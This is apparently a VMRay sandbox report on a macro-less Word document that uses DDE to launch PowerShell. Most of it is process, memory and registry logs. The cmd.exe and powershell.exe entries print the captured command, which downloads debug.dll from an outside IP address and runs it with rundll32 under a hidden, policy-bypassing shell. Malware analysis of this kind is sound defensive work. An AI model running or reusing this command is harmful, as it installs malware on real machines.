Macro-less Word Doc. uses DDE to Execute Powershell, Download DLL | Sequential Behavior
Try VMRay Analyzer
|
The sample contacted only unknown URLs. |
| URL | Connection Successful | Reputation Status |
|---|---|---|
| 213.183.51.187/debug.dll |
|
Unknown
|
| Hostname | IP Addresses | Country | City | Protocols | Has Blacklisted URL |
|---|---|---|---|---|---|
| 213.183.51.187 | NL | Amsterdam | HTTP, TCP |
|
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\office15\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:09, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:06 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x98c |
| Parent PID | 0x618 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9C4
0x
9C0
0x
9BC
0x
9B8
0x
9B4
0x
9B0
0x
9A4
0x
9A0
0x
99C
0x
998
0x
994
0x
990
0x
A0C
0x
A94
0x
D24
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x001b7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001d0000 | 0x001d0000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x003d0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000400000 | 0x00400000 | 0x00401fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x00419fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000420000 | 0x00420000 | 0x0042ffff | Private Memory |
|
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000530000 | 0x00530000 | 0x00560fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000570000 | 0x00570000 | 0x0057ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000580000 | 0x00580000 | 0x0065efff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000660000 | 0x00660000 | 0x00666fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000670000 | 0x00670000 | 0x00671fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000680000 | 0x00680000 | 0x00680fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000690000 | 0x00690000 | 0x00691fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000006a0000 | 0x006a0000 | 0x006a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006b0000 | 0x006b0000 | 0x006bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006c0000 | 0x006c0000 | 0x006c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006d0000 | 0x006d0000 | 0x006d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006e0000 | 0x006e0000 | 0x006e0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x006f0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000700000 | 0x00700000 | 0x007fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000800000 | 0x00800000 | 0x00800fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000810000 | 0x00810000 | 0x00810fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000820000 | 0x00820000 | 0x00820fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000830000 | 0x00830000 | 0x00830fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000840000 | 0x00840000 | 0x00840fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000850000 | 0x00850000 | 0x00850fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000860000 | 0x00860000 | 0x00860fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000870000 | 0x00870000 | 0x00870fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000880000 | 0x00880000 | 0x00880fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000890000 | 0x00890000 | 0x00890fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000008a0000 | 0x008a0000 | 0x008affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000008b0000 | 0x008b0000 | 0x009affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009b0000 | 0x009b0000 | 0x009cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009d0000 | 0x009d0000 | 0x009d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009e0000 | 0x009e0000 | 0x009effff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x009f0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000a00000 | 0x00a00000 | 0x00a0ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00a13fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a20000 | 0x00a20000 | 0x00a20fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a30000 | 0x00a30000 | 0x00a30fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a40000 | 0x00a40000 | 0x00a7ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000a80000 | 0x00a80000 | 0x00a81fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000a90000 | 0x00a90000 | 0x00acffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000ad0000 | 0x00ad0000 | 0x00ad0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000ae0000 | 0x00ae0000 | 0x00ae0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| msxml6r.dll | 0x00af0000 | 0x00af0fff | Memory Mapped File | Readable |
|
|
|
|
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db | 0x00b00000 | 0x00b25fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000b30000 | 0x00b30000 | 0x00b30fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000b40000 | 0x00b40000 | 0x00b7ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| c_1255.nls | 0x00b80000 | 0x00b90fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000ba0000 | 0x00ba0000 | 0x00c9ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000ca0000 | 0x00ca0000 | 0x01092fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000010a0000 | 0x010a0000 | 0x010a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000010b0000 | 0x010b0000 | 0x010b0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000010c0000 | 0x010c0000 | 0x010c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000010d0000 | 0x010d0000 | 0x010eefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000010f0000 | 0x010f0000 | 0x010f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001100000 | 0x01100000 | 0x01100fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001110000 | 0x01110000 | 0x0111ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001120000 | 0x01120000 | 0x0119ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000011a0000 | 0x011a0000 | 0x011a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000011b0000 | 0x011b0000 | 0x011b0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000011c0000 | 0x011c0000 | 0x012bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000012c0000 | 0x012c0000 | 0x012c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000012d0000 | 0x012d0000 | 0x012d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000012e0000 | 0x012e0000 | 0x012e0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000012f0000 | 0x012f0000 | 0x012f0fff | Private Memory | Readable, Writable |
|
|
|
|
| winword.exe | 0x01300000 | 0x014d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000014e0000 | 0x014e0000 | 0x020dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x020e0000 | 0x023aefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000023b0000 | 0x023b0000 | 0x023b0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023c0000 | 0x023c0000 | 0x023c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023d0000 | 0x023d0000 | 0x023d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023e0000 | 0x023e0000 | 0x023e0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023f0000 | 0x023f0000 | 0x023f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002400000 | 0x02400000 | 0x02400fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002410000 | 0x02410000 | 0x02410fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002420000 | 0x02420000 | 0x02420fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002430000 | 0x02430000 | 0x02430fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002440000 | 0x02440000 | 0x02440fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002450000 | 0x02450000 | 0x02450fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002460000 | 0x02460000 | 0x02461fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000024f0000 | 0x024f0000 | 0x025effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002640000 | 0x02640000 | 0x0273ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002760000 | 0x02760000 | 0x0279ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000027a0000 | 0x027a0000 | 0x02b9ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| staticcache.dat | 0x02ba0000 | 0x034cffff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000034d0000 | 0x034d0000 | 0x03ccffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003d10000 | 0x03d10000 | 0x03d4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003db0000 | 0x03db0000 | 0x03dbffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003dd0000 | 0x03dd0000 | 0x03ecffff | Private Memory | Readable, Writable |
|
|
|
|
| segoeui.ttf | 0x03ed0000 | 0x03f4efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000003f80000 | 0x03f80000 | 0x0407ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x04080000 | 0x0413ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000004140000 | 0x04140000 | 0x0423ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004240000 | 0x04240000 | 0x0433ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004340000 | 0x04340000 | 0x0443ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004560000 | 0x04560000 | 0x0465ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000004660000 | 0x04660000 | 0x04a5ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| seguisb.ttf | 0x04a60000 | 0x04ac3fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000004b10000 | 0x04b10000 | 0x04b4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004d30000 | 0x04d30000 | 0x04d6ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004d70000 | 0x04d70000 | 0x0516ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000005170000 | 0x05170000 | 0x0536ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000005370000 | 0x05370000 | 0x0576ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000005770000 | 0x05770000 | 0x05f6ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000005f70000 | 0x05f70000 | 0x06370fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006380000 | 0x06380000 | 0x06780fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006790000 | 0x06790000 | 0x06b90fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006ba0000 | 0x06ba0000 | 0x06d9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006da0000 | 0x06da0000 | 0x0725ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000007260000 | 0x07260000 | 0x0765ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000007660000 | 0x07660000 | 0x07e5ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000036890000 | 0x36890000 | 0x3689ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| osppc.dll | 0x63a70000 | 0x63a9cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| riched20.dll | 0x63aa0000 | 0x63c2dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| adal.dll | 0x63c30000 | 0x63ce4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mscoreei.dll | 0x63cf0000 | 0x63d69fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dwrite.dll | 0x63e40000 | 0x63f49fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d3d10warp.dll | 0x63f50000 | 0x6407bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msores.dll | 0x64080000 | 0x68d6afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mso.dll | 0x68d70000 | 0x6a653fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wwlib.dll | 0x6a660000 | 0x6bb1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mscoree.dll | 0x6bb30000 | 0x6bb79fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d3d11.dll | 0x6bb80000 | 0x6bc02fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msptls.dll | 0x6bc10000 | 0x6bd25fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msointl.dll | 0x6bd30000 | 0x6c0a0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wwintl.dll | 0x6c0b0000 | 0x6c16ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d2d1.dll | 0x6c170000 | 0x6c229fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oart.dll | 0x6c230000 | 0x6cfd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winspool.drv | 0x6f5b0000 | 0x6f600fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msxml6.dll | 0x6fa80000 | 0x6fbd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| office.odf | 0x70ac0000 | 0x70fbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msi.dll | 0x70fc0000 | 0x711fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcp100.dll | 0x71230000 | 0x71298fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcr100.dll | 0x712a0000 | 0x7135efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dxgi.dll | 0x716f0000 | 0x71772fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
|
For performance reasons, the remaining 172 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | c:\Windows\System32\cmd.exe /k powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','%temp%debug.dll');rundll32.exe '%temp%debug.dll' HOK |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:20, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
| Information | Value |
|---|---|
| PID | 0xa38 |
| Parent PID | 0x98c (c:\program files\microsoft office\office15\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A3C
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2017-10-11 11:01:08 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 54241 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\cmd.exe, base_address = 0x49e50000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x765e24c2 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String |
|
2 | ||
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 16, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = c:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String |
|
1 | ||
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\BGC6u8Oy yXGxkR\Desktop |
|
1 | |
| Environment | Get Environment String |
|
1 | ||
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x765cac6c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x765e2732 |
|
1 | |
| Environment | Get Environment String | name = temp, result_out = C:\Users\BGC6U8~1\AppData\Local\Temp |
|
2 | |
| File | Get Info | filename = powershell.exe, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xa50, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD, value = 0 |
|
1 | |
| Environment | Get Environment String |
|
1 |
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll');rundll32.exe 'C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll' HOK |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:20, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
| Information | Value |
|---|---|
| PID | 0xa50 |
| Parent PID | 0xa38 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A54
0x
A60
0x
A6C
0x
A78
0x
A8C
0x
A90
0x
AA8
0x
AAC
0x
AB0
0x
AB4
0x
AEC
0x
D18
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\tempdebug.dll | 519.00 KB (531456 bytes) |
MD5:
64b2ac701a0d67da134e13b2efc46900
SHA1: 1bb516d70591a5a0eb55ee71f9f38597f3640b14 SHA256: f3f55c3df39b85d934121355bed439b53501f996e9b39d4abed14c7fe8081d92 |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Set Environment String | name = PSExecutionPolicyPreference, value = Bypass |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
